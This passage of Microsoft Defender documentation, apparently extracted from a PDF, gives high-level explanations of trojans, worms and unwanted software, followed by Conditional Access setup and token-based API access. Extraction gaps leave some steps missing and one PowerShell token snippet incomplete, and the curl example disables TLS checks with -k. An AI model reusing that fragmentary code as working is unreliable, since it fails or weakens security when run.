Contact your bank or other financial institutions if you paid them.
Reporting tech support scams

Help Microsoft stop scammers, whether they claim to be from Microsoft or from
another tech company, by reporting tech support scams:
www.microsoft.com/reportascam
You can also report any unsafe website that you suspect is a phishing website or
contains malicious content directly to Microsoft by filling out a Report an unsafe site
form or using built in web browser functionality.
Feedback

Trojans
Article • 02/28/2024
Trojans are a common type of malware, which, unlike viruses, can't spread on their own.
This means they either have to be downloaded manually or another malware needs to
download and install them.
Trojans often use the same file names as real and legitimate apps. It's easy to
accidentally download a trojan thinking that it's a legitimate app.
How trojans work

Trojans can come in many different varieties, but generally they do the following tasks:
Download and install other malware, such as viruses or worms.
Use the infected device for select fraud.
Record keystrokes and websites visited.
Send information about the infected device to a malicious hacker including

passwords, sign in details for websites, and browsing history.
Give a malicious hacker control over the infected device.
How to protect against trojans

Use the following free Microsoft software to detect and remove it:
Microsoft Defender Antivirus for Windows 10 and Windows 8.1, or Microsoft

Security Essentials for previous versions of Windows.
Microsoft Safety Scanner
Feedback

Understanding malware & other threats
Article • 02/28/2024
Malware is a term used to describe malicious applications and code that can cause
damage and disrupt normal use of devices. Malware can allow unauthorized access, use
system resources, steal passwords, lock you out of your computer and ask for ransom,
and more.
Cybercriminals that distribute malware are often motivated by money and will use
infected computers to launch attacks, obtain banking credentials, collect information
that can be sold, sell access to computing resources, or extort payment from victims.
As criminals become more sophisticated with their attacks, Microsoft is here to help.
Windows 10 is the most secure version of Windows yet and includes many features to
help protect you whether you're at home, at work, or on the go. With Microsoft
Defender for Endpoint , businesses can stay protected with next-generation protection
and other security capabilities.
For good general tips, check out the prevent malware infection topic.
There are many types of malware, including:
Coin miners
Exploits and exploit kits
Macro malware
Phishing
Ransomware
Rootkits
Supply chain attacks
Tech support scams
Trojans
Unwanted software
Worms
Additional resources and information

Keep up with the latest malware news and research. Check out our Microsoft
security blogs and follow us on Twitter for the latest news, discoveries, and
protections.
Learn more about Windows security.

Learn how to deploy threat protection capabilities across Microsoft 365 E5.
Feedback

Unwanted software
Article • 02/28/2024
Unwanted software are programs that alter the Windows experience without your
consent or control. This can take the form of modified browsing experience, lack of
control over downloads and installation, misleading messages, or unauthorized changes
to Windows settings.
How unwanted software works

Unwanted software can be introduced when a user searches for and downloads
applications from the internet. Some applications are software bundlers, which means
that they're packed with other applications. As a result, other programs can be
inadvertently installed when the original application is downloaded.
Here are some indications of unwanted software:
There are programs that you didn't install and that may be difficult to uninstall
Browser features or settings have changed, and you can't view or modify them
There are excessive messages about your device's health or about files and
programs
There are ads that can't be easily closed
Some indicators are harder to recognize because they're less disruptive, but are still
unwanted. For example, unwanted software can modify web pages to display specific
ads, monitor browsing activities, or remove control of the browser.
How to protect against unwanted software

To prevent unwanted software infection, download software only from official websites,
or from the Microsoft Store. Be wary of downloading software from third-party sites.
Use Microsoft Edge when browsing the internet. Microsoft Edge includes additional
protections that effectively block browser modifiers that can change your browser
settings. Microsoft Edge also blocks known websites hosting unwanted software using
Windows Defender SmartScreen (also used by Internet Explorer).
Enable Microsoft Defender Antivirus in Windows 10. It provides real-time protection

against threats and detects and removes known unwanted software.
Download Microsoft Security Essentials for real-time protection in Windows 7 or
Windows Vista.
What should I do if my device is infected?

If you suspect that you have unwanted software, you can submit files for analysis .
Some unwanted software adds uninstallation entries, which means that you can remove
them using Settings.
1. Select the Start button

2. Go to Settings > Apps > Apps & features.
3. Select the app you want to uninstall, then select Uninstall.
If you only recently noticed symptoms of unwanted software infection, consider sorting
the apps by install date, and then uninstall the most recent apps that you didn't install.
You may also need to remove browser add-ons in your browsers, such as Internet
Explorer, Firefox, or Chrome.

Feedback

Worms
Article • 02/28/2024
A worm is a type of malware that can copy itself and often spreads through a network
by exploiting security vulnerabilities. It can spread through email attachments, text
messages, file-sharing programs, social networking sites, network shares, removable
drives, and software vulnerabilities.
How worms work

Worms represent a large category of malware. Different worms use different methods to
infect devices. Depending on the variant, they can steal sensitive information, change
security settings, send information to malicious hackers, stop users from accessing files,
and other malicious activities.
Jenxcus (also known as Dunihi), Gamarue (also known as Androm), and Bondat have
consistently remained at the top of the list of malware that infects users running
Microsoft software. Although these worms share some commonalities, it's interesting to
note that they also have distinct characteristics.
Jenxcus has capabilities of not only infecting removable drives but can also act as
a backdoor that connects back to its server. This threat typically gets into a device
from a drive-by download attack, meaning it's installed when users just visit a
compromised web page.
Gamarue typically arrives through spam campaigns, exploits, downloaders, social

networking sites, and removable drives. When Gamarue infects a device, it
becomes a distribution channel for other malware. We've seen it distribute other
malware such as info stealers, spammers, clickers, downloaders, and rogues.
Bondat typically arrives through fictitious Nullsoft Scriptable Install System (NSIS),
Java installers, and removable drives. When Bondat infects a system, it gathers
information about the machine such as device name, Globally Unique Identifier
(GUID), and OS build. It then sends that information to a remote server.
Both Bondat and Gamarue have clever ways of obscuring themselves to evade
detection. By hiding what they're doing, they try to avoid detection by security software.
WannaCrypt also deserves a mention here. Unlike older worms that often
spread just because they could, modern worms often spread to drop a payload
(like ransomware).
This image shows how a worm can quickly spread through a shared USB drive.
Figure worm spreading from a shared USB drive
How to protect against worms

Enable Microsoft Defender Antivirus in Windows 10. It provides real-time protection
against threats and detects and removes known unwanted software.
Download Microsoft Security Essentials for real-time protection in Windows 7 or

Windows Vista.

Feedback

Understand threat intelligence concepts
Article • 11/15/2023
Applies to:

７ Note
Try our new APIs using MS Graph security API. Find out more at: Use the
Microsoft Graph security API - Microsoft Graph | Microsoft Learn.
Multiple complex malicious events, attributes, and contextual information comprise

advanced cybersecurity attacks. Identifying and deciding which of these activities qualify
as suspicious can be a challenging task. Your knowledge of known attributes and
abnormal activities specific to your industry is fundamental in knowing when to call an
observed behavior as suspicious.
With Microsoft Defender XDR, you can create custom threat alerts that can help you
keep track of possible attack activities in your organization. You can flag suspicious
events to piece together clues and possibly stop an attack chain. These custom threat
alerts will only appear in your organization and will flag events that you set it to track.
Before creating custom threat alerts, it's important to know the concepts behind alert
definitions and indicators of compromise (IOCs) and the relationship between them.
Alert definitions
Alert definitions are contextual attributes that can be used collectively to identify early
clues on a possible cybersecurity attack. These indicators are typically a combination of
activities, characteristics, and actions taken by an attacker to successfully achieve the
objective of an attack. Monitoring these combinations of attributes is critical in gaining a
vantage point against attacks and possibly interfering with the chain of events before an
attacker's objective is reached.
Indicators of compromise (IOC)
IOCs are individually known malicious events that indicate that a network or device has
already been breached. Unlike alert definitions, these indicators are considered as
evidence of a breach. They're often seen after an attack has already been carried out
and the objective has been reached, such as exfiltration. Keeping track of IOCs is also
important during forensic investigations. Although it might not be able to intervene with
an attack chain, gathering these indicators can be useful in creating better defenses for
possible future attacks.
Relationship between alert definitions and IOCs

In the context of Microsoft Defender XDR and Microsoft Defender for Endpoint, alert
definitions are containers for IOCs and defines the alert, including the metadata that is
raised for a specific IOC match. Various metadata is provided as part of the alert
definitions. Metadata such as alert definition name of attack, severity, and description is
provided along with other options.
Each IOC defines the concrete detection logic based on its type, value, and action, which
determines how it's matched. It's bound to a specific alert definition that defines how a
detection is displayed as an alert on the Microsoft Defender XDR console.
Here's an example of an IOC:
Type: Sha1
Value: 92cfceb39d57d914ed8b14d0e37643de0797ae56
Action: Equals
IOCs have a many-to-one relationship with alert definitions such that an alert definition
can have many IOCs that correspond to it.
Related topics
Use the Microsoft Graph security API - Microsoft Graph | Microsoft Learn
Manage indicators
 Tip
Feedback

Configure Conditional Access in
Article • 10/25/2023
Applies to:

This section guides you through all the steps you need to take to properly implement
Conditional Access.
Before you begin
２ Warning
It's important to note that Microsoft Entra registered devices is not supported in
this scenario.
Only Intune enrolled devices are supported.
You need to make sure that all your devices are enrolled in Intune. You can use any of
the following options to enroll devices in Intune:
IT Admin: For more information on how to enable auto-enrollment, see Windows

Enrollment
End-user: For more information on how to enroll your Windows 10 and Windows
11 device in Intune, see Enroll your Windows 10 device in Intune
End-user alternative: For more information on joining a Microsoft Entra domain,
see How to: Plan your Microsoft Entra join implementation.
There are steps you'll need to take in Microsoft Defender XDR, the Intune portal, and
Microsoft Entra admin center.
It's important to note the required roles to access these portals and implement
Conditional access:
Microsoft Defender XDR - You'll need to sign into the portal with a global
administrator role to turn on the integration.
Intune - You'll need to sign in to the portal with security administrator rights with
management permissions.
Microsoft Entra admin center - You'll need to sign in as a global administrator,
security administrator, or Conditional Access administrator.
７ Note
You'll need a Microsoft Intune environment, with Intune managed and Microsoft
Entra joined Windows 10 and Windows 11 devices.
Take the following steps to enable Conditional Access:
Step 1: Turn on the Microsoft Intune connection from Microsoft Defender XDR
Step 2: Turn on the Defender for Endpoint integration in Intune
Step 3: Create the compliance policy in Intune
Step 4: Assign the policy
Step 5: Create a Microsoft Entra Conditional Access policy
Step 1: Turn on the Microsoft Intune connection

features > Microsoft Intune connection.
2. Toggle the Microsoft Intune setting to On.
3. Click Save preferences.
Step 2: Turn on the Defender for Endpoint integration in

Intune
1. Sign in to the Intune portal
2. Select Endpoint Security > Microsoft Defender for Endpoint.
3. Set Connect Windows 10.0.15063+ devices to Microsoft Defender Advanced
Threat Protection to On.
4. Click Save.
Step 3: Create the compliance policy in Intune

1. In the Azure portal , select All services, filter on Intune, and select Microsoft
Intune.
2. Select Device compliance > Policies > Create policy.
3. Enter a Name and Description.
4. In Platform, select Windows 10 and later.
5. In the Device Health settings, set Require the device to be at or under the Device
Threat Level to your preferred level:
Secured: This level is the most secure. The device cannot have any existing
threats and still access company resources. If any threats are found, the
device is evaluated as noncompliant.
Low: The device is compliant if only low-level threats exist. Devices with
medium or high threat levels are not compliant.
Medium: The device is compliant if the threats found on the device are low or
medium. If high-level threats are detected, the device is determined as
noncompliant.
High: This level is the least secure, and allows all threat levels. So devices that
with high, medium or low threat levels are considered compliant.
6. Select OK, and Create to save your changes (and create the policy).
Step 4: Assign the policy

1. In the Azure portal , select All services, filter on Intune, and select Microsoft
Intune.
2. Select Device compliance > Policies> select your Microsoft Defender for Endpoint
compliance policy.
3. Select Assignments.
4. Include or exclude your Microsoft Entra groups to assign them the policy.
5. To deploy the policy to the groups, select Save. The user devices targeted by the
policy are evaluated for compliance.
Step 5: Create a Microsoft Entra Conditional Access policy

1. In the Azure portal , open Microsoft Entra ID > Conditional Access > New
policy.
2. Enter a policy Name, and select Users and groups. Use the Include or Exclude
options to add your groups for the policy, and select Done.
3. Select Cloud apps, and choose which apps to protect. For example, choose Select
apps, and select Office 365 SharePoint Online and Office 365 Exchange Online.
Select Done to save your changes.
4. Select Conditions > Client apps to apply the policy to apps and browsers. For
example, select Yes, and then enable Browser and Mobile apps and desktop
clients. Select Done to save your changes.
5. Select Grant to apply Conditional Access based on device compliance. For

example, select Grant access > Require device to be marked as compliant.
Choose Select to save your changes.
6. Select Enable policy, and then Create to save your changes.
７ Note
You can use the Microsoft Defender for Endpoint app along with the Approved
Client app , App Protection policy and Compliant Device (Require device to be
marked as compliant) controls in Microsoft Entra Conditional Access policies.
There's no exclusion required for the Microsoft Defender for Endpoint app while
setting up Conditional Access. Although Microsoft Defender for Endpoint on
Android & iOS (App ID - dd47d17a-3194-4d86-bfd5-c6ae6f5651e3) isn't an
approved app, it is able to report device security posture in all the three grant
permissions.
However, internally Defender requests MSGraph/User.read scope and Intune

Tunnel scope (in case of Defender+Tunnel scenarios). So these scopes must be
excluded*. To exclude MSGraph/User.read scope, any one cloud app can be
excluded. To exclude Tunnel scope, you need to exclude 'Microsoft Tunnel
Gateway'.These permission and exclusions enables the flow for compliance
information to Conditional Access.
*Please note that applying a Conditional Access policy to All Cloud Apps could
inadvertently block user access in some cases, so it's not recommended. Read more
about Conditional Access policies on Cloud Apps
For more information, see Enforce compliance for Microsoft Defender for Endpoint with
Conditional Access in Intune.
 Tip
Feedback

Configure Microsoft Defender for Cloud
Apps in Microsoft Defender for
Endpoint
Article • 11/15/2023
Applies to:

To benefit from Microsoft Defender for Endpoint cloud app discovery signals, turn on
Microsoft Defender for Cloud Apps integration.
７ Note
This feature will be available with an E5 license for Enterprise Mobility + Security
on devices running Windows 10 and Windows 11.
 Tip
See Microsoft Defender for Endpoint integration with Microsoft Defender for
Cloud Apps for detailed integration of Microsoft Defender for Endpoint with
Microsoft Defender for Cloud Apps.
Enable Microsoft Defender for Cloud Apps in

1. In the navigation pane, select Preferences setup > Advanced features.
2. Select Microsoft Defender for Cloud Apps and switch the toggle to On.
3. Click Save preferences.
Once activated, Microsoft Defender for Endpoint will immediately start forwarding
discovery signals to Defender for Cloud Apps.
View the data collected
To view and access Microsoft Defender for Endpoint data in Microsoft Defender for
Cloud Apps, see Investigate devices in Defender for Cloud Apps.
For more information about cloud discovery, see Working with discovered apps.
If you're interested in trying Microsoft Defender for Cloud Apps, see Microsoft Defender
for Cloud Apps Trial .
Related topic
Microsoft Defender for Cloud Apps integration
 Tip
Feedback

Overview of management and APIs
Article • 09/27/2023
Applies to:

Defender for Endpoint supports a wide variety of options to ensure that customers can
easily adopt the platform.
Acknowledging that customer environments and structures can vary, Defender for
Endpoint was created with flexibility and granular control to fit varying customer
requirements.
Endpoint onboarding and portal access

Device onboarding is fully integrated into Microsoft Configuration Manager and
Microsoft Intune for client devices and Microsoft Defender for server devices, providing
complete end-to-end experience of configuration, deployment, and monitoring. In
addition, Microsoft Defender for Endpoint supports Group Policy and other third-party
tools used for devices management.
Defender for Endpoint provides fine-grained control over what users with access to the
portal can see and do through the flexibility of role-based access control (RBAC). The
RBAC model supports all flavors of security teams structure:
Globally distributed organizations and security teams

Tiered model security operations teams
Fully segregated divisions with single centralized global security operations teams
Available APIs
The Microsoft Defender for Endpoint solution is built on top of an integration-ready
platform.
Defender for Endpoint exposes much of its data and actions through a set of
programmatic APIs. Those APIs will enable you to automate workflows and innovate
based on Defender for Endpoint capabilities.
The Defender for Endpoint APIs can be grouped into three:
Microsoft Defender for Endpoint APIs

Raw data streaming API
SIEM integration

Defender for Endpoint offers a layered API model exposing data and capabilities in a
structured, clear, and easy to use model, exposed through a standard Azure AD-based
authentication and authorization model allowing access in context of users or SaaS
applications. The API model was designed to expose entities and capabilities in a
consistent form.
Watch this video for a quick overview of Defender for Endpoint's APIs.
https://www.microsoft.com/en-us/videoplayer/embed/RE4d73M?postJsllMsg=true
The Investigation API exposes the richness of Defender for Endpoint - exposing
calculated or 'profiled' entities (for example, device, user, and file) and discrete events
(for example, process creation and file creation) which typically describes a behavior
related to an entity, enabling access to data via investigation interfaces allowing a
query-based access to data. For more information, see Supported APIs.
The Response API exposes the ability to take actions in the service and on devices,
enabling customers to ingest indicators, manage settings, alert status, as well as take
response actions on devices programmatically such as isolate devices from the network,
quarantine files, and others.
Raw data streaming API

Defender for Endpoint raw data streaming API provides the ability for customers to ship
real-time events and alerts from their instances as they occur within a single data
stream, providing a low latency, high throughput delivery mechanism.
The Defender for Endpoint event information is pushed directly to Azure storage for
long-term data retention, or to Azure Event Hubs for consumption by visualization
services or additional data processing engines.
For more information, see Raw data streaming API.
The new Microsoft Defender XDR Streaming API includes email and alert events in
addition to device events. For more information, see Microsoft Defender XDR Streaming
API.
SIEM API
When you enable security information and event management (SIEM) integration, it
allows you to pull detections from Microsoft Defender XDR using your SIEM solution or
by connecting directly to the detections REST API. This activates the SIEM connector
access details section with pre-populated values and an application is created under
your Microsoft Entra tenant.
Related topics
Access the Microsoft Defender for Endpoint APIs
Supported APIs
Technical partner opportunities
 Tip
Feedback

Microsoft Defender for Endpoint API
release notes
Article • 01/19/2024
Applies to:

The following information lists the updates made to the Microsoft Defender for
Endpoint APIs and the dates they were made.
Release notes - newest to oldest (dd.mm.yyyy)
08.08.2022
Added new Export Device Health API method - GET /api/public/avdeviceshealth
Export device health methods and properties
06.10.2021
Added new Export assessment API method - Delta Export software vulnerabilities
assessment (JSON response) Export assessment methods and properties per device.
25.05.2021
Added new API Export assessment methods and properties per device.
03.05.2021
Added new API: Remediation activity methods and properties.
10.02.2021
Added new API: Batch update alerts.
25.01.2021
Updated rate limitations for Advanced Hunting API from 15 to 45 requests per
minute.
21.01.2021
Added new API: Find devices by tag.
Added new API: Import Indicators.
03.01.2021
Updated Alert evidence: added detectionStatus, parentProcessFilePath and
parentProcessFileName properties.
Updated Alert entity: added detectorId property.
15.12.2020
Updated Device entity: added IpInterfaces list. See List devices.
04.11.2020
Added new API: Set device value.
Updated Device entity: added deviceValue property.
01.09.2020
Added option to expand the Alert entity with its related Evidence. See List Alerts.
 Tip
Feedback
Microsoft Defender for Endpoint API
license and terms of use
Article • 01/18/2024
Applies to:

APIs
Defender for Endpoint APIs are governed by Microsoft API License and Terms of use.
Throttling limits
ﾉ Expand table
Name Calls Renewal period
API calls per connection 100 60 seconds
Legal Notices
Microsoft and any contributors grant you a license to the Microsoft documentation and
other content in this repository under the Creative Commons Attribution 4.0
International Public License, see the LICENSE file.
Microsoft, Windows, Microsoft Azure and/or other Microsoft products and services
referenced in the documentation may be either trademarks or registered trademarks of
Microsoft in the United States and/or other countries. The licenses for this project do
not grant you rights to use any Microsoft names, logos, or trademarks. Microsoft's
general trademark guidelines can be found at https://go.microsoft.com/fwlink/p/?
LinkID=254653 .
Privacy information can be found at https://privacy.microsoft.com/ .
Microsoft and any contributors reserve all others rights, whether under their respective
copyrights, patents, or trademarks, whether by implication, estoppel or otherwise.
Access the Microsoft Defender for
Endpoint APIs
Article • 11/30/2023
Applies to:

） Important
Advanced hunting capabilities are not included in Defender for Business.
Defender for Endpoint exposes much of its data and actions through a set of
programmatic APIs. Those APIs will enable you to automate workflows and innovate
based on Defender for Endpoint capabilities. The API access requires OAuth2.0
authentication. For more information, see OAuth 2.0 Authorization Code Flow.
Watch this video for a quick overview of Defender for Endpoint's APIs.
https://www.microsoft.com/en-us/videoplayer/embed/RE4d73M?postJsllMsg=true
In general, you'll need to take the following steps to use the APIs:
Create a Microsoft Entra application

Get an access token using this application
Use the token to access Defender for Endpoint API
You can access Defender for Endpoint API with Application Context or User Context.
Application Context: (Recommended)
Used by apps that run without a signed-in user present. for example, apps that run
as background services or daemons.
Steps that need to be taken to access Defender for Endpoint API with application
context:
1. Create a Microsoft Entra Web-Application.

2. Assign the desired permission to the application, for example, 'Read Alerts',
'Isolate Machines'.
3. Create a key for this Application.
4. Get token using the application with its key.
5. Use the token to access the Microsoft Defender for Endpoint API
For more information, see Get access with application context.
User Context:
Used to perform actions in the API on behalf of a user.
Steps to take to access Defender for Endpoint API with user context:
1. Create Microsoft Entra Native-Application.
2. Assign the desired permission to the application, e.g 'Read Alerts', 'Isolate
Machines' etc.
3. Get token using the application with user credentials.
4. Use the token to access the Microsoft Defender for Endpoint API
For more information, see Get access with user context.
 Tip
When more than one query request is required to retrieve all the results, Microsoft
Graph returns an @odata.nextLink property in the response that contains a URL to
the next page of results. For more information, see Paging Microsoft Graph data in
your app.
Related topics
Access Microsoft Defender for Endpoint with application context
Access Microsoft Defender for Endpoint with user context
 Tip
Feedback

Microsoft Defender for Endpoint API -
Hello World
Article • 10/20/2023
Applies to:

７ Note
 Tip
Get Alerts using a simple PowerShell script
How long it takes to go through this example?

It only takes 5 minutes done in two steps:
Application registration
Use examples: only requires copy/paste of a short PowerShell script
Do I need a permission to connect?

For the Application registration stage, you must have a Global administrator role in
your Microsoft Entra tenant.
Step 1 - Create an App in Microsoft Entra ID

1. Log on to Azure with your Global administrator user.
2. Navigate to Microsoft Entra ID > App registrations > New registration.
3. In the registration form, choose a name for your application and then click
Register.
4. Allow your Application to access Defender for Endpoint and assign it 'Read all
alerts' permission:
On your application page, click API Permissions > Add permission > APIs
my organization uses > type WindowsDefenderATP and click on
WindowsDefenderATP.
７ Note
WindowsDefenderATP does not appear in the original list. You need to

start writing its name in the text box to see it appear.

Choose Application permissions > Alert.Read.All > Click on Add

permissions.
） Important
You need to select the relevant permissions. 'Read All Alerts' is only an
example!
For example:
To run advanced queries, select 'Run advanced queries' permission.
To isolate a machine, select 'Isolate machine' permission.
To determine which permission you need, please look at the Permissions
section in the API you are interested to call.
5. Click Grant consent.
７ Note
Every time you add permission, you must click on Grant consent for the new
permission to take effect.
6. Add a secret to the application.
Click Certificates & secrets, add description to the secret and click Add.
） Important
After click Add, copy the generated secret value. You won't be able to
retrieve after you leave!

7. Write down your application ID and your tenant ID.
On your application page, go to Overview and copy the following:
Done! You have successfully registered an application!
Step 2 - Get a token using the App and use this token to
access the API.
Copy the script below to PowerShell ISE or to a text editor, and save it as Get-
Token.ps1.
Running this script will generate a token and will save it in the working folder
under the name Latest-token.txt.
PowerShell
# That code gets the App Context Token and save it to a file named
"Latest-token.txt" under the current directory
# Paste below your Tenant ID, App ID and App Secret (App key).
$tenantId = '' ### Paste your tenant ID here

$appId = '' ### Paste your Application ID here
$appSecret = '' ### Paste your Application secret here
$resourceAppIdUri = 'https://api.securitycenter.microsoft.com'
$oAuthUri = "https://login.microsoftonline.com/$TenantId/oauth2/token"
$authBody = [Ordered] @{
resource = "$resourceAppIdUri"
client_id = "$appId"
client_secret = "$appSecret"
grant_type = 'client_credentials'
}
$authResponse = Invoke-RestMethod -Method Post -Uri $oAuthUri -Body
$authBody -ErrorAction Stop
$token = $authResponse.access_token
Out-File -FilePath "./Latest-token.txt" -InputObject $token
return $token
Sanity Check:
Run the script.
In your browser go to: https://jwt.ms/ .
Copy the token (the content of the Latest-token.txt file).
Paste in the top box.
Look for the "roles" section. Find the Alert.Read.All role.

Let's get the Alerts!

The script below will use Get-Token.ps1 to access the API and will get the past 48
hours Alerts.
Save this script in the same folder you saved the previous script Get-Token.ps1.
The script creates two files (json and csv) with the data in the same folder as the
scripts.
PowerShell
# Returns Alerts created in the past 48 hours.
$token = ./Get-Token.ps1 #run the script Get-Token.ps1 - make

sure you are running this script from the same folder of Get-Token.ps1
# Get Alert from the last 48 hours. Make sure you have alerts in that
time frame.
$dateTime = (Get-Date).ToUniversalTime().AddHours(-48).ToString("o")
# The URL contains the type of query and the time filter we create
above
# Read more about [other query options and filters](get-alerts.md).
$url = "https://api.securitycenter.microsoft.com/api/alerts?
`$filter=alertCreationTime ge $dateTime"
# Set the WebRequest headers

$headers = @{
'Content-Type' = 'application/json'
Accept = 'application/json'
Authorization = "Bearer $token"
}
# Send the webrequest and get the results.

$response = Invoke-WebRequest -Method Get -Uri $url -Headers $headers -
ErrorAction Stop
# Extract the alerts from the results.

$alerts = ($response | ConvertFrom-Json).value | ConvertTo-Json
# Get string with the execution time. We concatenate that string to the
output file to avoid overwrite the file
$dateTimeForFileName = Get-Date -Format o | foreach {$_ -replace ":",
"."}
# Save the result as json and as csv

$outputJsonPath = "./Latest Alerts $dateTimeForFileName.json"
$outputCsvPath = "./Latest Alerts $dateTimeForFileName.csv"
Out-File -FilePath $outputJsonPath -InputObject $alerts

($alerts | ConvertFrom-Json) | Export-CSV $outputCsvPath -
NoTypeInformation
You're all done! You have just successfully:
Created and registered and application

Granted permission for that application to read alerts
Connected the API
Used a PowerShell script to return alerts created in the past 48 hours
Related topic
Access Microsoft Defender for Endpoint with user context
 Tip
Feedback

Create an app to access Microsoft
Defender for Endpoint without a user
Article • 11/30/2023
Applies to:

） Important
７ Note
 Tip
This page describes how to create an application to get programmatic access to

Defender for Endpoint without a user. If you need programmatic access to Defender for
Endpoint on behalf of a user, see Get access with user context. If you are not sure which
access you need, see Get started.
Microsoft Defender for Endpoint exposes much of its data and actions through a set of
programmatic APIs. Those APIs will help you automate work flows and innovate based
on Defender for Endpoint capabilities. The API access requires OAuth2.0 authentication.
For more information, see OAuth 2.0 Authorization Code Flow.
Create a Microsoft Entra application.

Get an access token using this application.
Use the token to access Defender for Endpoint API.
This article explains how to create a Microsoft Entra application, get an access token to
Microsoft Defender for Endpoint, and validate the token.
Create an app
1. Log on to Azure with a user that has the Global Administrator role.
3. In the registration form, choose a name for your application, and then select
Register.
4. To enable your app to access Defender for Endpoint and assign it 'Read all alerts'
permission, on your application page, select API Permissions > Add permission >
APIs my organization uses >, type WindowsDefenderATP, and then select
WindowsDefenderATP.
７ Note
WindowsDefenderATP does not appear in the original list. Start writing its
name in the text box to see it appear.

Select Application permissions > Alert.Read.All, and then select Add permissions.
You need to select the relevant permissions. 'Read All Alerts' is only an example.
For example:
To run advanced queries, select the 'Run advanced queries' permission.

To isolate a device, select the 'Isolate machine' permission.
To determine which permission you need, look at the Permissions section in
the API you are interested to call.
5. Select Grant consent.
７ Note
Every time you add a permission, you must select Grant consent for the new
permission to take effect.
6. To add a secret to the application, select Certificates & secrets, add a description
to the secret, and then select Add.
７ Note
After you select Add, select copy the generated secret value. You won't be
able to retrieve this value after you leave.

7. Write down your application ID and your tenant ID. On your application page, go
to Overview and copy the following.
8. For Microsoft Defender for Endpoint Partners only. Set your app to be multi-
tenanted (available in all tenants after consent). This is required for third-party
apps (for example, if you create an app that is intended to run in multiple
customers' tenant). This is not required if you create a service that you want to run
in your tenant only (for example, if you create an application for your own usage
that will only interact with your own data). To set your app to be multi-tenanted:
Go to Authentication, and add https://portal.azure.com as the Redirect
URI.
On the bottom of the page, under Supported account types, select the
Accounts in any organizational directory application consent for your multi-
tenant app.
You need your application to be approved in each tenant where you intend to use
it. This is because your application interacts Defender for Endpoint on behalf of
your customer.
You (or your customer if you are writing a third-party app) need to select the
consent link and approve your app. The consent should be done with a user who
has administrative privileges in Active Directory.
The consent link is formed as follows:
https
https://login.microsoftonline.com/common/oauth2/authorize?
prompt=consent&client_id=00000000-0000-0000-0000-
000000000000&response_type=code&sso_reload=true
Where 00000000-0000-0000-0000-000000000000 is replaced with your application

ID.
Done! You have successfully registered an application! See examples below for token
acquisition and validation.
Get an access token

For more information on Microsoft Entra tokens, see the Microsoft Entra tutorial.
Use PowerShell
PowerShell
# This script acquires the App Context Token and stores it in the variable
$token for later use in the script.
# Paste your Tenant ID, App ID, and App Secret (App key) into the indicated
quotes below.

$appSecret = '' ### Paste your Application key here
$sourceAppIdUri = 'https://api.securitycenter.microsoft.com/.default'
scope = "$sourceAppIdUri"
}
$token
Use C#:
The following code was tested with NuGet Microsoft.Identity.Client 3.19.8.
） Important
The Microsoft.IdentityModel.Clients.ActiveDirectory NuGet package and Azure

AD Authentication Library (ADAL) have been deprecated. No new features have
been added since June 30, 2020. We strongly encourage you to upgrade, see the
migration guide for more details.
1. Create a new console application.
2. Install NuGet Microsoft.Identity.Client .
3. Add the following:
C#
using Microsoft.Identity.Client;
4. Copy and paste the following code in your app (don't forget to update the three
variables: tenantId, appId, appSecret ):
C#
string tenantId = "00000000-0000-0000-0000-000000000000"; // Paste your

own tenant ID here
string appId = "11111111-1111-1111-1111-111111111111"; // Paste your
own app ID here
string appSecret = "22222222-2222-2222-2222-222222222222"; // Paste
your own app secret here for a test, and then store it in a safe place!
const string authority = "https://login.microsoftonline.com";
const string audience = "https://api.securitycenter.microsoft.com";
IConfidentialClientApplication myApp =
ConfidentialClientApplicationBuilder.Create(appId).WithClientSecret(app
Secret).WithAuthority($"{authority}/{tenantId}").Build();
List<string> scopes = new List<string>() { $"{audience}/.default" };
AuthenticationResult authResult =
myApp.AcquireTokenForClient(scopes).ExecuteAsync().GetAwaiter().GetResu
lt();
string token = authResult.AccessToken;
Use Python
See Get token using Python.
Use Curl
７ Note
The following procedure assumes that Curl for Windows is already installed on your
computer.
1. Open a command prompt, and set CLIENT_ID to your Azure application ID.
2. Set CLIENT_SECRET to your Azure application secret.
3. Set TENANT_ID to the Azure tenant ID of the customer that wants to use your app
to access Defender for Endpoint.
4. Run the following command:
Console
curl -i -X POST -H "Content-Type:application/x-www-form-urlencoded" -d

"grant_type=client_credentials" -d "client_id=%CLIENT_ID%" -d
"scope=https://securitycenter.onmicrosoft.com/windowsatpservice/.defaul
t" -d "client_secret=%CLIENT_SECRET%"
"https://login.microsoftonline.com/%TENANT_ID%/oauth2/v2.0/token" -k
You will get an answer in the following form:

Console
{"token_type":"Bearer","expires_in":3599,"ext_expires_in":0,"access_tok
en":"eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIn <truncated>
aWReH7P0s0tjTBX8wGWqJUdDA"}
Validate the token

Ensure that you got the correct token:
1. Copy and paste the token you got in the previous step into JWT in order to
decode it.
2. Validate that you get a 'roles' claim with the desired permissions.
In the following image, you can see a decoded token acquired from an app with
permissions to all of Microsoft Defender for Endpoint's roles:

Use the token to access Microsoft Defender for

Endpoint API
1. Choose the API you want to use. For more information, see Supported Defender
for Endpoint APIs.
2. Set the authorization header in the http request you send to "Bearer {token}"
(Bearer is the authorization scheme).
3. The expiration time of the token is one hour. You can send more than one request
with the same token.
The following is an example of sending a request to get a list of alerts using C#:
C#
var httpClient = new HttpClient();
var request = new HttpRequestMessage(HttpMethod.Get,

"https://api.securitycenter.microsoft.com/api/alerts");
request.Headers.Authorization = new AuthenticationHeaderValue("Bearer",

token);
var response = httpClient.SendAsync(request).GetAwaiter().GetResult();
// Do something useful with the response
See also
Supported Microsoft Defender for Endpoint APIs
Access Microsoft Defender for Endpoint on behalf of a user
 Tip
Feedback

Use Microsoft Defender for Endpoint
APIs
Article • 11/30/2023
Applies to:

） Important
７ Note
 Tip
This page describes how to create an application to get programmatic access to

Defender for Endpoint on behalf of a user.
If you need programmatic access Microsoft Defender for Endpoint without a user, refer
to Access Microsoft Defender for Endpoint with application context.
If you are not sure which access you need, read the Introduction page.
programmatic APIs. Those APIs will enable you to automate work flows and innovate
based on Microsoft Defender for Endpoint capabilities. The API access requires
OAuth2.0 authentication. For more information, see OAuth 2.0 Authorization Code Flow.
Create a Microsoft Entra application

Get an access token using this application
Use the token to access Defender for Endpoint API
This page explains how to create a Microsoft Entra application, get an access token to
Microsoft Defender for Endpoint and validate the token.
７ Note
When accessing Microsoft Defender for Endpoint API on behalf of a user, you will
need the correct Application permission and user permission. If you are not familiar
with user permissions on Microsoft Defender for Endpoint, see Manage portal
access using role-based access control.
 Tip
If you have the permission to perform an action in the portal, you have the
